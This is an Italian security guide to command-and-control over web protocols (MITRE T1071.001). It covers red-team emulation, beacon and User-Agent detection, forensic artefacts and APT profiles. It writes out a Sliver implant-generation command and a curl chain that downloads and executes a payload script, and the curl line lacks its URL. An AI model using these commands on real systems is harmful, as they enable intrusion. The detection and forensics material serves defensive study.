C2 via Protocolli Web: Web Protocols (T1071.001)

L'obiettivo di un red team che simula T1071.001 è dimostrare al Blue Team che il traffico C2 può transitare indisturbato su canali web apparentemente normali. Il primo passo è scegliere un framework C2 che supporti profili HTTP personalizzabili.

Cobalt Strike (a pagamento) resta il punto di riferimento: i Malleable C2 Profile permettono di modellare ogni dettaglio della comunicazione HTTP — URI, header, cookie, intervallo di beacon e jitter. In laboratorio si può creare un profilo che imita il traffico verso un CDN noto, includendo header come X-Forwarded-For e cookie realistici. Il listener si configura dal Team Server specificando il profilo con il parametro di avvio dedicato.

Per chi preferisce soluzioni open source, Sliver (open source) offre listener HTTP e HTTPS nativi. La generazione di un implant HTTP si ottiene dalla console interattiva con il comando:

generate --http --os windows --arch amd64 --save /tmp/implant.exe

Sliver supporta anche la rotazione automatica dei domini C2, utile per testare la capacità del SOC di correlare traffico verso host diversi.

Havoc (open source) rappresenta un'alternativa più recente con supporto per listener HTTP/S e profili di comunicazione personalizzabili. Mythic (open source) aggiunge un'architettura modulare ad agenti, con il profilo HTTP configurabile dal pannello web.

Per simulare scenari più basilari — ad esempio un malware che usa curl per scaricare payload, come fanno TeamTNT e Rocke — basta una catena semplice su Linux:

curl -s -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64)" -o /tmp/payload.sh && chmod +x /tmp/payload.sh && /tmp/payload.sh

Su Windows, PowerShell replica lo stesso pattern con Invoke-WebRequest e un User-Agent personalizzato tramite il parametro -UserAgent.

Per testare la detection del WebSocket, Drovorub usa proprio un HTTP Upgrade request per inizializzare la comunicazione C2: si può replicare il comportamento con un semplice script Python che usa la libreria websockets (open source) verso un server di test.

Infine, Brute Ratel C4 (a pagamento) offre profili HTTP/S avanzati con tecniche anti-detection come il sleep masking, utile per verificare se gli strumenti EDR rilevano implant dormienti che si risvegliano solo per comunicazioni HTTP periodiche.

Durante ogni esercizio, registra con Wireshark (open source) o tcpdump (open source) il traffico generato: il confronto tra catture maligne e traffico legittimo diventa materiale prezioso per il tuning degli alert.

Rilevare C2 su HTTP/S è una sfida di rapporto segnale-rumore, perché il protocollo è lo stesso usato da ogni browser e applicazione cloud. La chiave è cercare anomalie comportamentali, non firme statiche.

La prima log source indispensabile è il flusso di rete (NSM:Flow) — Zeek (open source) o Suricata (open source) analizzano metadati di ogni connessione HTTP senza decifrare il payload. Su Windows, Sysmon (gratuito) con EventCode 3 (Network Connection) cattura ogni connessione in uscita con il processo sorgente, consentendo di correlare chi parla e verso dove. Su Linux, auditd con regole SYSCALL su connect offre visibilità analoga.

Il pattern di detection più efficace è l'analisi del beaconing: molti implant — da Cobalt Strike a KEYPLUG a TONESHELL — chiamano il C2 a intervalli regolari con jitter minimo. RITA (open source) analizza i log Zeek e identifica connessioni con periodicità sospetta, calcolando deviazioni statistiche sugli intervalli tra richieste successive. Un beacon con callback ogni 60 secondi ±5% produce una distribuzione temporale riconoscibile.

Il secondo indicatore è lo User-Agent anomalo. La campagna Quad7 Activity utilizzava User-Agent specifici che imitavano browser datati combinati con ID applicativi Azure. Un alert basato su una whitelist di User-Agent noti nell'ambiente — costruita con un periodo di baselining di 2-4 settimane — cattura varianti sospette senza generare troppo rumore.

Il JA3/JA3S fingerprinting aggiunge un livello di detection sul traffico HTTPS. Ogni client TLS produce un hash JA3 derivato dai parametri del handshake: un implant compilato in Go o Rust genera hash diversi da Chrome o Firefox. Il confronto tra JA3 osservati e quelli dei browser autorizzati evidenzia connessioni anomale. Zeek e Suricata supportano nativamente l'estrazione JA3.

Per la gestione dei falsi positivi, i tuning suggeriti dai dati di detection offrono tre leve operative:

• ProcessNameExclusions: escludere browser legittimi e utility di rete note (Windows Update, aggiornamenti AV)
• OutboundByteRatioThreshold: segnalare sessioni HTTP dove il traffico in uscita supera il 90% del totale — indicatore di esfiltrazione o upload di dati rubati
• URIEntropyThreshold: rilevare dati codificati Base64 o hex negli URI o nei cookie, come faceva Dark Caracal con Bandook (payload Base64 con suffisso "&&&") e la campagna 3CX Supply Chain Attack con cookie contenenti variabili hardcoded

Su macOS, la detection si concentra su processi non-browser che generano traffico web — AppleScript, Automator o LaunchDaemons che invocano connessioni HTTP/S sono anomali e meritano alert ad alta priorità. Su ESXi, qualsiasi chiamata curl o wget dalla shell verso IP pubblici è da considerarsi sospetta di default.

Quando un incidente coinvolge C2 su protocolli web, la ricostruzione della timeline parte da due flussi paralleli: gli artefatti di rete e quelli endpoint. L'incrocio dei due stabilisce il "chi, quando, verso dove".

Artefatti di rete. I log del proxy web o del firewall next-gen sono la fonte primaria. Ogni entry contiene timestamp, IP sorgente, URL di destinazione, metodo HTTP (GET/POST), User-Agent, dimensione della risposta e codice di stato. Cerca pattern POST ripetitivi verso lo stesso endpoint: la campagna 2015 Ukraine Electric Power Attack usava BlackEnergy con HTTP POST verso i server C2, e Sandworm Team ha mantenuto questo pattern in campagne successive. Anche OilRig nelle campagne Outer Space e Juicy Mix ha usato comunicazioni HTTP verso server compromessi, incluso il protocollo Exchange Web Services.

Se l'ambiente utilizza Zeek, i log http.log e ssl.log offrono una visione granulare: il campo orig_fuids correla le richieste HTTP con i file trasferiti registrati in files.log, permettendo di ricostruire ogni download effettuato dall'implant.

Artefatti Windows. Sysmon EventCode 3 registra ogni connessione con processo sorgente, IP destinazione e porta. Cerca processi inattesi — rundll32.exe, regsvr32.exe, mshta.exe — che stabiliscono connessioni HTTP/S verso IP esterni. Il registro eventi Microsoft-Windows-WebIO/Operational cattura dettagli sulle richieste WinHTTP, usato da malware come RDAT. Il file %LocalAppData%\Microsoft\Windows\WebCache\WebCacheV01.dat (il database ESE di Internet Explorer/Edge Legacy) conserva cronologia, cookie e dati di form: malware come Ke3chang che usa l'interfaccia COM IWebBrowser2 lascia tracce in questo database.

Artefatti Linux. La bash history e i log di auditd sono essenziali. Cerca invocazioni di curl e wget con flag sospetti come -s (silent), -k (ignora certificati) o redirect verso pipe. La campagna C0017 di APT41 mostra un esempio da manuale con l'esecuzione di wget per scaricare payload denominati "kernel". I file temporanei in /tmp e /dev/shm associati a timestamp coerenti con le connessioni di rete completano il quadro.

Cookie e header come veicoli di dati. Diversi malware nascondono comandi nei cookie HTTP: UPPERCUT inseriva codici di errore nel campo Cookie, ChChes vi incorporava dati esfiltrati, e FRAMESTING leggeva comandi dal cookie DSID. In fase forense, l'estrazione dei valori Cookie dai log proxy è prioritaria: decodificando Base64 o XOR si rivelano spesso i comandi C2 in chiaro.

Per la ricostruzione temporale, strumenti come Plaso/log2timeline (open source) consentono di creare una super-timeline che fonde artefatti di filesystem, registro eventi e log di rete in un unico flusso cronologico ordinato.

Con 56 gruppi che adottano T1071.001, questa tecnica è trasversale a quasi ogni area geografica e motivazione. Alcuni profili meritano attenzione particolare per la ricchezza delle campagne documentate e la sofisticazione del canale C2.

APT41 combina spionaggio e crimine finanziario con un arsenale HTTP versatile. Nella campagna C0017 ha sfruttato exploit zero-day contro applicazioni web governative USA, scaricando payload via wget HTTP. Nella più recente APT41 DUST, ha adottato HTTPS per il C2 con tool come DUSTTRAP, colpendo settori logistici e media in Europa, Asia e Medio Oriente. Il pattern è chiaro: APT41 adatta il canale HTTP al contesto dell'operazione, oscillando tra HTTP grezzo per velocità e HTTPS per discrezione.

Lazarus Group usa C2 HTTP/HTTPS in modo sistematico da anni. La campagna Operation Dream Job — che ha preso di mira difesa, aerospazio e governi tra USA, Israele, Australia, Russia e India — si appoggiava a comunicazioni HTTP e HTTPS verso server C2 controllati dagli attori. Il gruppo ha anche legami con la 3CX Supply Chain Attack, dove il malware AppleJeus sfruttava cookie HTTPS con variabili hardcoded (__tutma, __tutmc) per mascherare il traffico C2.

OilRig rappresenta un caso interessante di evoluzione progressiva. Nelle campagne Outer Space (2021) e Juicy Mix (2022), il gruppo iraniano ha usato HTTP per comunicare tra backdoor installate e server compromessi, includendo l'abuso dell'API Exchange Web Services come canale C2 — un approccio che sfrutta infrastruttura legittima per evitare detection. Il tool SampleCheck5000 nella campagna Outer Space incarna questa filosofia.

Sandworm Team, operante per l'intelligence militare russa, ha impiegato HTTP POST nella 2015 Ukraine Electric Power Attack con BlackEnergy per comunicare con i server C2 durante l'attacco alla rete elettrica ucraina. Il BCS-server tool dello stesso gruppo conferma la preferenza per HTTP come protocollo C2 anche in operazioni successive.

Mustang Panda merita attenzione per la campagna RedDelta Modified PlugX Infection Chain Operations (2023-2024), che ha colpito entità in Asia orientale e sudorientale usando HTTP POST da installazioni PlugX. La persistenza di PlugX nell'arsenale di Mustang Panda, combinata con catene di infezione via phishing sempre aggiornate, suggerisce che il gruppo continuerà ad affidarsi a C2 HTTP con varianti incrementali.

Un trend emergente è l'abuso di API cloud legittime come canale HTTP: CreepyDrive usa la Microsoft Graph API via HTTPS, BLUELIGHT fa lo stesso, e OilBooster sfrutta richieste GET/POST/PUT/DELETE verso la Graph API sulla porta 443. Per l'analista TI, monitorare il traffico verso endpoint API cloud da processi non autorizzati è una priorità crescente.

Framework MITRE ATT&CK: T1071.001, TA0011. Campagne: C0047, C0058, C0048, C0014, C0055, C0001, C0017, C0044, C0043, C0002, C0042, C0021, C0039, C0028, C0012, C0022, C0018, C0057, C0040, C0046, C0024. Mitigazioni: M1031 (Network Intrusion Prevention), M1037 (Filter Network Traffic). Detection: DET0027 (AN0075–AN0079). Tool di detection citati: Zeek, Suricata, RITA, Sysmon, Plaso/log2timeline, Wireshark, tcpdump. Tool offensivi citati: Cobalt Strike, Sliver, Havoc, Mythic, Brute Ratel C4. Integrato con conoscenza professionale per tool e procedure operative.